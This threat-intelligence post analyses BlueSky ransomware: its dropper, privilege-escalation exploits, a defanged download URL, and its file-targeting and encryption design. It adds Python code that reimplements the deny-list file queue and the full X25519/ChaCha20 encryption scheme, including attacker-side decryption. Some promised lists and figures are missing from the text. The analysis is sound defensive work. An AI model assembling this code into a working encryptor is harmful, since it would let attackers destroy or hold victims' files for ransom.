Based on the information available, BlueSky ransomware has not yet leaked any stolen data publicly, and the Bitcoin wallets linked to BlueSky samples have not recorded any transactions. This suggests the threat is still in its infancy.
Although infection rates are currently minimal, the ransomware's characteristics, detailed below, suggest it has been carefully crafted for a sustained campaign. In this post, we examine the latest intelligence on BlueSky ransomware to help security teams strengthen their defenses against this emerging threat.
Significantly, before dropping the final BlueSky payload, the PowerShell dropper checks whether it is running as a privileged user. If so, it proceeds directly to download and execute the ransomware payload. If not, it attempts to escalate local privileges using a technique chosen by the version of the host operating system. On versions earlier than Windows 10, such as Windows 7, 8 or XP, the script downloads and executes a modified build of the JuicyPotato local privilege escalation tool. On Windows 10 or later, it downloads and executes ghost.exe and spooler.exe, which exploit the local privilege escalation vulnerabilities CVE-2020-0796 (SMBGhost) and CVE-2021-1732 (a win32k elevation of privilege flaw), respectively. Both vulnerabilities have had vendor patches available since 2020 and 2021, so on a fully patched host this escalation path fails and the dropper only succeeds if the user already holds elevated rights; patch status for these two CVEs is therefore a direct measure of exposure to the dropper's escalation stage.
The vulnerabilities exploited to gain privileges are listed below.
After gaining additional privileges, the PowerShell dropper downloads the final BlueSky ransomware payload from hxxps://kmsauto[.]us/someone/I.exe and saves it to the filesystem as javaw.exe, borrowing the name of the legitimate Java runtime launcher so that it blends in with normal software. Eventually, the sample executes from the file path
BlueSky drops the ransom note as a text file named # DECRYPT FILES BLUESKY #.txt and an HTML file named # DECRYPT FILES BLUESKY #.html in every local directory where it has successfully encrypted files and renamed them with the .bluesky extension. The content of these two files is shown below.
File encryption limitations: Most ransomware carries an allow-list of file extensions that identifies the files eligible for encryption. BlueSky takes the opposite approach: it carries an exclusion list of extensions that are skipped during encryption, and every file whose extension is not on that list is a target. One practical consequence is that files with unusual or missing extensions are encrypted rather than spared.
BlueSky ransomware uses a multithreaded work queue for encryption. It starts several threads: one enumerates files on the local filesystem and on mounted network shares and adds them to the queue, while one or more worker threads pull paths from the queue and encrypt them. The flow chart below illustrates this process.
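As an added illustration, not code from the original analysis or from the BlueSky sample, the following Python sketch shows the two ideas above together: a deny-list eligibility check (everything not on the exclusion list is a target) and a producer/consumer queue with one enumerator thread and several worker threads. The exclusion list, the directory tree and the fact that workers only record paths instead of encrypting them are constructed assumptions for the demonstration; the real extension list is not reproduced on this page.

```python
import os
import queue
import tempfile
import threading

# Constructed stand-in for BlueSky's exclusion list (assumption, not the real list):
# extensions that are skipped. Everything else is a target, including files with no extension.
EXCLUDED_EXTENSIONS = {".exe", ".dll", ".sys", ".lnk", ".bluesky"}
_STOP = object()  # sentinel telling a worker thread to exit


def is_eligible(path, excluded=EXCLUDED_EXTENSIONS):
    """Deny-list check: a file is a target unless its extension is excluded.
    Compare with an allow-list, where an unknown or missing extension would be spared."""
    return os.path.splitext(path)[1].lower() not in excluded


def enumerate_files(root, work_queue, num_workers, excluded=EXCLUDED_EXTENSIONS):
    """Producer: walk the tree, queue eligible files, then queue one sentinel per worker."""
    for dirpath, _dirnames, filenames in os.walk(root):
        for name in filenames:
            full = os.path.join(dirpath, name)
            if is_eligible(full, excluded):
                work_queue.put(full)
    for _ in range(num_workers):
        work_queue.put(_STOP)


def worker(work_queue, processed, lock):
    """Consumer: in the malware this thread encrypts the file; here it only records the path."""
    while True:
        item = work_queue.get()
        if item is _STOP:
            return
        with lock:
            processed.append(item)


def run_pipeline(root, num_workers=4, excluded=EXCLUDED_EXTENSIONS):
    """Start the workers and the enumerator, wait for all of them, return what was 'processed'."""
    work_queue = queue.Queue()
    processed, lock = [], threading.Lock()
    threads = [threading.Thread(target=worker, args=(work_queue, processed, lock))
               for _ in range(num_workers)]
    threads.append(threading.Thread(target=enumerate_files,
                                    args=(root, work_queue, num_workers, excluded)))
    for t in threads:
        t.start()
    for t in threads:
        t.join()
    return sorted(os.path.relpath(p, root).replace(os.sep, "/") for p in processed)


def build_sample_tree():
    """Constructed directory tree for the demonstration (not real victim data)."""
    root = tempfile.mkdtemp()
    os.makedirs(os.path.join(root, "docs"))
    for rel in ("docs/report.docx", "docs/notes.txt", "README", "app.exe", "lib.dll", "old.bluesky"):
        with open(os.path.join(root, rel), "wb") as f:
            f.write(b"constructed sample content")
    return root


if __name__ == "__main__":
    print(run_pipeline(build_sample_tree()))
```

The enumerator finishes by pushing one sentinel per worker, so the workers drain the queue completely before exiting; the already-renamed .bluesky files are excluded, which is how a deny-list encryptor avoids double-encrypting its own output on a second run.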
BlueSky's file encryption resembles that of Babuk ransomware: both use Curve25519 to generate a key pair for the host and derive a shared secret from the host's private key and the attacker's public key carried in the sample. BlueSky then hashes the shared secret and uses the result as the ChaCha20 file encryption key. Finally, it reads the file into a buffer, encrypts the buffer with ChaCha20 and overwrites the original file contents with the result. Because the attacker's private key never leaves the operator, the key material present on the host is not enough to recover the files; only the holder of the attacker's private key can recompute the shared secret.
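The following Python is an added example, written for this page and not taken from BlueSky or Babuk, that reproduces the described scheme end to end: X25519 (Curve25519) scalar multiplication per RFC 7748, a hash of the shared secret as the ChaCha20 key, and RFC 8439 ChaCha20 over the file buffer, plus the attacker-side decryption that the scheme permits. SHA-256 as the hash, a fixed zero nonce, a fresh ephemeral host key pair per file and storing the host public key next to the ciphertext are assumptions the page does not specify. The arithmetic uses plain Python integers and is not constant-time; it is for understanding the protocol, not for use.

```python
import hashlib
import os
import struct

P = 2**255 - 19
_A24 = 121665
_BASEPOINT = (9).to_bytes(32, "little")


def x25519(scalar, u):
    """RFC 7748 X25519: Montgomery ladder over Curve25519. Demo only, not constant-time."""
    k = bytearray(scalar)
    k[0] &= 248
    k[31] &= 127
    k[31] |= 64
    k = int.from_bytes(k, "little")
    x1 = int.from_bytes(u, "little") & ((1 << 255) - 1)
    x2, z2, x3, z3, swap = 1, 0, x1, 1, 0
    for t in range(254, -1, -1):
        kt = (k >> t) & 1
        swap ^= kt
        if swap:
            x2, x3, z2, z3 = x3, x2, z3, z2
        swap = kt
        a, b = (x2 + z2) % P, (x2 - z2) % P
        aa, bb = a * a % P, b * b % P
        e = (aa - bb) % P
        c, d = (x3 + z3) % P, (x3 - z3) % P
        da, cb = d * a % P, c * b % P
        x3 = pow(da + cb, 2, P)
        z3 = x1 * pow(da - cb, 2, P) % P
        x2 = aa * bb % P
        z2 = e * (aa + _A24 * e) % P
    if swap:
        x2, x3, z2, z3 = x3, x2, z3, z2
    return (x2 * pow(z2, P - 2, P) % P).to_bytes(32, "little")


def x25519_public(private):
    """Public key = scalar * base point (u = 9)."""
    return x25519(private, _BASEPOINT)


def _rotl(v, c):
    return ((v << c) | (v >> (32 - c))) & 0xFFFFFFFF


def _qr(s, a, b, c, d):
    s[a] = (s[a] + s[b]) & 0xFFFFFFFF; s[d] = _rotl(s[d] ^ s[a], 16)
    s[c] = (s[c] + s[d]) & 0xFFFFFFFF; s[b] = _rotl(s[b] ^ s[c], 12)
    s[a] = (s[a] + s[b]) & 0xFFFFFFFF; s[d] = _rotl(s[d] ^ s[a], 8)
    s[c] = (s[c] + s[d]) & 0xFFFFFFFF; s[b] = _rotl(s[b] ^ s[c], 7)


def _chacha20_block(key, counter, nonce):
    """One 64-byte keystream block (RFC 8439 section 2.3)."""
    state = (list(struct.unpack("<4I", b"expand 32-byte k")) + list(struct.unpack("<8I", key))
             + [counter] + list(struct.unpack("<3I", nonce)))
    w = state[:]
    for _ in range(10):
        _qr(w, 0, 4, 8, 12); _qr(w, 1, 5, 9, 13); _qr(w, 2, 6, 10, 14); _qr(w, 3, 7, 11, 15)
        _qr(w, 0, 5, 10, 15); _qr(w, 1, 6, 11, 12); _qr(w, 2, 7, 8, 13); _qr(w, 3, 4, 9, 14)
    return struct.pack("<16I", *[(x + y) & 0xFFFFFFFF for x, y in zip(w, state)])


def chacha20_xor(key, nonce, data, counter=1):
    """XOR data with the ChaCha20 keystream; the same call encrypts and decrypts."""
    out = bytearray()
    for i in range(0, len(data), 64):
        block = _chacha20_block(key, counter + i // 64, nonce)
        out += bytes(p ^ k for p, k in zip(data[i:i + 64], block))
    return bytes(out)


def derive_file_key(shared_secret):
    # The page says "a hash of the shared key" seeds ChaCha20; SHA-256 is assumed here.
    return hashlib.sha256(shared_secret).digest()


_NONCE = b"\x00" * 12  # nonce handling is not described on the page; fixed value assumed


def encrypt_file_buffer(plaintext, attacker_public, host_private=None):
    """Host side: ephemeral X25519 key pair, ECDH with the attacker's public key, ChaCha20.
    Returns the host public key too, since it must be stored with the ciphertext for recovery."""
    host_private = host_private or os.urandom(32)
    key = derive_file_key(x25519(host_private, attacker_public))
    return x25519_public(host_private), chacha20_xor(key, _NONCE, plaintext)


def decrypt_file_buffer(ciphertext, host_public, attacker_private):
    """Attacker side: only the attacker's private key recomputes the shared secret."""
    key = derive_file_key(x25519(attacker_private, host_public))
    return chacha20_xor(key, _NONCE, ciphertext)
```

Two checks are worth running against any such reimplementation: the RFC 7748 section 6.1 Diffie-Hellman vectors for X25519 and the RFC 8439 section 2.4.2 encryption vector for ChaCha20. A decryptor that only uses data found on the victim host has nothing to work with, because the shared secret requires either the host's discarded private key or the attacker's private key.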
T1140 - Deobfuscate/Decode Files or Information: the BlueSky downloader base64-decodes and decompresses data to unpack the next-stage payload. The ransomware payload stores its ransom note RC4-encrypted and uses a custom encryption scheme to protect its embedded strings.
Cyber criminals behind ransomware attacks continuously adopt more advanced tactics, making it harder for defenders to thwart them. These techniques include encoding and encrypting malicious code and delivering payloads in multiple stages. BlueSky encrypts files on victim machines quickly by using multiple threads, and it employs obfuscation such as API hashing to impede reverse engineering by security analysts.
BlueSky ransomware shows that cyber criminals still rely on basic but very effective social engineering to deceive people. When looking for cracked software, remember that there is always a price; in this case it is ransomware with a high ransom demand. Educating users not to install cracked software on company computers or personal devices is a simple but effective way to stop similar threats.